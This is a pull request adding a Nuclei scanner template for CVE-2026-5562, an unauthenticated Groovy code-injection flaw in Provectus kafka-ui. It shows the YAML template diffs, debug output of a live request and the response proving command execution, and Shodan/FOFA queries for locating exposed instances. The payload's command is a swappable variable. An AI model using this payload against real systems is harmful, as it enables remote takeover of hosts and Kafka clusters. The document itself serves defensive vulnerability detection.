### PR TITLE
Add CVE-2026-5562 template: Provectus kafka-ui Code Injection

### DIFF
--- a/http/cves/2026/CVE-2026-5562.yaml
+++ b/http/cves/2026/CVE-2026-5562.yaml
@@ -9,7 +9,7 @@ info:
   impact: |
     Successful exploitation grants unauthenticated remote code execution in the context of the kafka-ui process, leading to full compromise of the host and the connected Kafka clusters.
   remediation: |
-    Upgrade kafka-ui to a release later than 0.7.2 that disables or sandboxes Groovy smart-filter execution, and restrict network access to the management interface.
+    Provectus kafka-ui is end-of-life and no patched release exists (0.7.2 is the final version). Migrate to the maintained kafbat/kafka-ui fork, and in the meantime restrict network access to the interface and place it behind authentication.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-5562
     - https://vuldb.com/?id.355332

--- a/http/cves/2026/CVE-2026-5562.yaml
+++ b/http/cves/2026/CVE-2026-5562.yaml
@@ -1,0 +1,62 @@
+id: CVE-2026-5562
+
+info:
+  name: Provectus kafka-ui Code Injection
+  author: christianfl,0xNayel
+  severity: critical
+  description: |
+    Provectus kafka-ui versions 0.7.0 through 0.7.2 suffer from a code injection vulnerability
+    in the `/api/smartfilters/testexecutions` endpoint that allows remote code execution.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2026-5562
+    - https://vuldb.com/vuln/355332
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-5562
+    cwe-id: CWE-94
+  tags: cve,cve2026,rce,kafkai-ui
+  metadata:
+    verified: true
+
+variables:
+  cmd: "id"
+  marker: "{{rand_base(8)}}"
+
+http:
+  - method: PUT
+    path:
+      - "{{BaseURL}}/api/smartfilters/testexecutions"
+
+    headers:
+      Content-Type: application/json
+
+    body: |
+      {
+        "filterCode": "throw new Exception(\"{{cmd}}\".execute().text + \"__marker: {{marker}}\")",
+        "key": "k",
+        "value": "v",
+        "offset": 0,
+        "partition": 0,
+        "timestampMs": 0
+      }
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "java.lang.Exception: uid="
+      - type: word
+        part: body
+        words:
+          - "java.lang.Exception: "
+          - "__marker: {{marker}}"
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'java\.lang\.Exception: (.*?)\\n__marker:'
+        group: 1

--- a/http/cves/2026/CVE-2026-5562.yaml
+++ b/http/cves/2026/CVE-2026-5562.yaml
@@ -1,62 +1,73 @@
 id: CVE-2026-5562
 
 info:
-  name: Provectus kafka-ui Code Injection
+  name: Provectus kafka-ui <=0.7.2 - Remote Code Execution
   author: christianfl,0xNayel
   severity: critical
   description: |
-    Provectus kafka-ui versions 0.7.0 through 0.7.2 suffer from a code injection vulnerability
-    in the `/api/smartfilters/testexecutions` endpoint that allows remote code execution.
+    Provectus kafka-ui versions 0.7.0 through 0.7.2 are vulnerable to code injection in the `/api/smartfilters/testexecutions` endpoint. The `filterCode` parameter is evaluated as a Groovy expression without sandboxing, allowing an unauthenticated attacker to execute arbitrary code and operating-system commands on the host.
+  impact: |
+    Successful exploitation grants unauthenticated remote code execution in the context of the kafka-ui process, leading to full compromise of the host and the connected Kafka clusters.
+  remediation: |
+    Upgrade kafka-ui to a release later than 0.7.2 that disables or sandboxes Groovy smart-filter execution, and restrict network access to the management interface.
   reference:
-    - https://nvd.nist.gov/vuln/detail/cve-2026-5562
-    - https://vuldb.com/vuln/355332
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-5562
+    - https://vuldb.com/?id.355332
+    - https://github.com/provectus/kafka-ui
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2026-5562
     cwe-id: CWE-94
-  tags: cve,cve2026,rce,kafkai-ui
   metadata:
     verified: true
+    max-request: 1
+    vendor: provectus
+    product: kafka-ui
+    shodan-query: http.title:"UI for Apache Kafka"
+    fofa-query: title="UI for Apache Kafka"
+  tags: cve,cve2026,rce,kafka-ui,provectus,groovy,injection,intrusive
 
 variables:
   cmd: "id"
-  marker: "{{rand_base(8)}}"
+  marker: "{{rand_base(6)}}"
 
 http:
-  - method: PUT
-    path:
-      - "{{BaseURL}}/api/smartfilters/testexecutions"
+  - raw:
+      - |
+        PUT /api/smartfilters/testexecutions HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Accept: application/json
 
-    headers:
-      Content-Type: application/json
+        {
+          "filterCode": "throw new Exception('{{marker}}_' + '{{cmd}}'.execute().text)",
+          "key": "k",
+          "value": "v",
+          "offset": 0,
+          "partition": 0,
+          "timestampMs": 0
+        }
 
-    body: |
-      {
-        "filterCode": "throw new Exception(\"{{cmd}}\".execute().text + \"__marker: {{marker}}\")",
-        "key": "k",
-        "value": "v",
-        "offset": 0,
-        "partition": 0,
-        "timestampMs": 0
-      }
-
-    matchers-condition: or
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "java.lang.Exception: uid="
-      - type: word
+          - "{{marker}}_"
+
+      - type: regex
         part: body
-        words:
-          - "java.lang.Exception: "
-          - "__marker: {{marker}}"
-        condition: and
+        regex:
+          - "uid=[0-9]+.*gid=[0-9]+.*"
+
+      - type: status
+        status:
+          - 200
 
     extractors:
       - type: regex
         part: body
-        regex:
-          - 'java\.lang\.Exception: (.*?)\\n__marker:'
         group: 1
+        regex:
+          - "{{marker}}_(uid=[0-9]+\\([a-z0-9_-]+\\)[^\"\\\\]*)"


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2026-5562
- References:
  - https://nvd.nist.gov/vuln/detail/cve-2026-5562
  - https://vuldb.com/vuln/355332

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

nuclei debug output:

```bash
$ nuclei -u http://localhost:8081 -t http/cves/2026/CVE-2026-5562.yaml -debug
WARNING: sonic/ast only supports (go1.17~1.26 and amd64 CPU) or (go1.20~1.26 and arm64 CPU), but your environment is not suitable and will fallback to encoding/json

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.11.1

		projectdiscovery.io

[INF] Current nuclei version: v3.11.1 (latest)
[INF] Current nuclei-templates version: v10.4.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 112
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-5562] Dumped HTTP request for http://localhost:8081/api/smartfilters/testexecutions

PUT /api/smartfilters/testexecutions HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Content-Length: 181
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "filterCode": "throw new Exception(\"id\".execute().text + \"__marker: BZ3u0WEE\")",
  "key": "k",
  "value": "v",
  "offset": 0,
  "partition": 0,
  "timestampMs": 0
}
[DBG] [CVE-2026-5562] Dumped HTTP response http://localhost:8081/api/smartfilters/testexecutions

HTTP/1.1 200 OK
Content-Length: 151
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Content-Type: application/json
Expires: 0
Pragma: no-cache
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Xss-Protection: 0

{"result":null,"error":"Execution error : java.lang.Exception: uid=100(kafkaui) gid=101(kafkaui) groups=101(kafkaui),101(kafkaui)\n__marker: BZ3u0WEE"}
[CVE-2026-5562:word-1] [http] [critical] http://localhost:8081/api/smartfilters/testexecutions ["uid=100(kafkaui) gid=101(kafkaui) groups=101(kafkaui),101(kafkaui)"]
[CVE-2026-5562:word-2] [http] [critical] http://localhost:8081/api/smartfilters/testexecutions ["uid=100(kafkaui) gid=101(kafkaui) groups=101(kafkaui),101(kafkaui)"]
[INF] Scan completed in 35.319665ms. 2 matches found.
[INF] HTTP connections: 1 total, 1 new, 0 reused (0.0%)
```

As per the README of the original project, the vulnerable version can easily be tested with a Docker container.

```
$ sudo docker run -it -p 8081:8080 -e DYNAMIC_CONFIG_ENABLED=true provectuslabs/kafka-ui:v0.7.2
```

Check with:

```
$ nuclei -u http://localhost:8081 -t http/cves/2026/CVE-2026-5562.yaml
```

See: https://github.com/provectus/kafka-ui

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
